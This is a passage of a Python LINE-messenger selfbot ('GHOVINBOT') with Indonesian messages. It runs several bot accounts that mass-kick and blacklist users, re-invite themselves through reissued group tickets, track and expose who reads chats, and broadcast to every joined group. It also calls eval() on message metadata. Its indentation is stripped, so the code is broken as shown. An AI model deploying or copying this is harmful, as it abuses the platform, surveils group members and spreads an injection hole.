invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
if op.type == 19:
try:
if op.param1 in protectantijs:
if op.param3 in mid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
sw.acceptGroupInvitation(op.param1)
G = sw.getGroup(op.param1)
G.preventedJoinByTicket = False
sw.updateGroup(G)
Ticket = sw.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = True
sw.updateGroup(G)
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.inviteIntoGroup(op.param1,[admin])
else:
pass
if op.param3 in Zmid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
else:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if op.param3 in admin:
if op.param1 in protectantijs:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.sendMessage(op.param1,"=Admin Invited=")
else:
pass
except:
pass
#-------------------------------------------------------------------------------
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.kickoutFromGroup(op.param1,[op.param2])
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = False
kc.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
pass
return
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,admin)
cl.inviteIntoGroup(op.param1,admin)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,admin)
ki.inviteIntoGroup(op.param1,admin)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,admin)
kk.inviteIntoGroup(op.param1,admin)
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,staff)
ki.inviteIntoGroup(op.param1,staff)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,staff)
kk.inviteIntoGroup(op.param1,staff)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param1,staff)
kc.inviteIntoGroup(op.param1,staff)
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["ARreadPoint"]:
if op.param2 in Setmain["ARreadMember"][op.param1]:
pass
else:
Setmain["ARreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(op.param1, image)
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.sendMessage(msg.to, wait["Respontag"])
cl.sendMessage(msg.to, None, contentMetadata={"STKID":"7839705","STKPKGID":"1192862","STKVER":"1"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "Jangan tag saya....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"「Cek ID Sticker」\n❧STKID : " + msg.contentMetadata["STKID"] + "\n❧STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\n❧STKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"❧Nama : " + msg.contentMetadata["displayName"] + "\n❧MID : " + msg.contentMetadata["mid"] + "\n❧Status Msg : " + contact.statusMessage + "\n❧Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"❧Nama : " + msg.contentMetadata["displayName"] + "\n❧MID : " + msg.contentMetadata["mid"] + "\n❧Status Msg : " + contact.statusMessage + "\n°Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot Dpk")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
cl.sendText(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ARfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["ARfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["ARfoto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["ARfoto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["ARfoto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
ki.sendChatChecked(msg.to, msg_id)
kk.sendChatChecked(msg.to, msg_id)
kc.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
cl.sendMessage(msg.to, str(helpMessage))
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
cl.sendMessage(msg.to, str(helpMessage1))
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "★GHOVINBOT★\n"
if wait["sticker"] == True: md+="❧Sticker「ON」\n"
else: md+="❧Sticker「OFF」\n"
if wait["contact"] == True: md+="❧Contact「ON」\n"
else: md+="❧Contact「OFF」\n"
if wait["talkban"] == True: md+="❧Talkban「ON」\n"
else: md+="❧Talkban「OFF」\n"
if wait["Mentionkick"] == True: md+="❧Notag「ON」\n"
else: md+="❧Notag「OFF」\n"
if wait["detectMention"] == True: md+="❧Respon「ON」\n"
else: md+="❧Respon「OFF」\n"
if wait["autoJoin"] == True: md+="❧Autojoin「ON」\n"
else: md+="❧Autojoin「OFF」\n"
if wait["autoAdd"] == True: md+="❧Autoadd「ON」\n"
else: md+="❧Autoadd「OFF」\n"
if msg.to in welcome: md+="❧Welcome「ON」\n"
else: md+="❧Welcome「OFF」\n"
if wait["autoLeave"] == True: md+="❧Autoleave「ON」\n"
else: md+="❧Autoleave「OFF」\n"
if msg.to in protectqr: md+="❧Protecturl「ON」\n"
else: md+="❧Protecturl「OFF」\n"
if msg.to in protectjoin: md+="❧Protectjoin「ON」\n"
else: md+="❧Protectjoin「OFF」\n"
if msg.to in protectkick: md+="❧Protectkick「ON」\n"
else: md+="❧Protectkick「OFF」\n"
if msg.to in protectcancel: md+="❧Protectcancel「ON」\n"
else: md+="❧Protectcancel「OFF」\n"
if msg.to in protectantijs: md+="❧Antijs「ON」\n"
else: md+="❧Antijs「OFF」\n"
if msg.to in ghost: md+="❧Ghost「ON」\n"
else: md+="❧Ghost「OFF」\n"
cl.sendMessage(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"Creator Bot ♠GHOVINBOT♠")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Type Selfbot 」\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "❧Nama : "+str(mi.displayName)+"\n❧Mid : " +key1+"\n❧Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
cl.sendMessage(group,"[ Broadcast ]\n" + str(pesan))
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "「Setkey」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "Tunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
cl.sendMessage(msg.to, "Silahkan gunakan seperti semula...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
cl.sendMessage(msg.to,bot)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "♦GHOVINBOT♦ Grup Info\n\n❧Nama Group : {}".format(G.name)+ "\n❧ID Group : {}".format(G.id)+ "\n❧Pembuat : {}".format(G.creator.displayName)+ "\n❧Waktu Dibuat : {}".format(str(timeCreated))+ "\n❧Jumlah Member : {}".format(str(len(G.members)))+ "\n❧Jumlah Pending : {}".format(gPending)+ "\n❧Group Qr : {}".format(gQr)+ "\n❧Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "★GHOVINBOT★ Grup Info\n"
ret_ += "\n❧Nama Group : {}".format(G.name)
ret_ += "\n❧ID Group : {}".format(G.id)
ret_ += "\n❧Pembuat : {}".format(gCreator)
ret_ += "\n❧Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n❧Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n❧Jumlah Pending : {}".format(gPending)
ret_ += "\n❧Group Qr : {}".format(gQr)
ret_ += "\n❧Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(to, str(ret_))
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "❧"+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"❧Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
for i in group:
ginfo = cl.getGroup(i)
if ginfo == group:
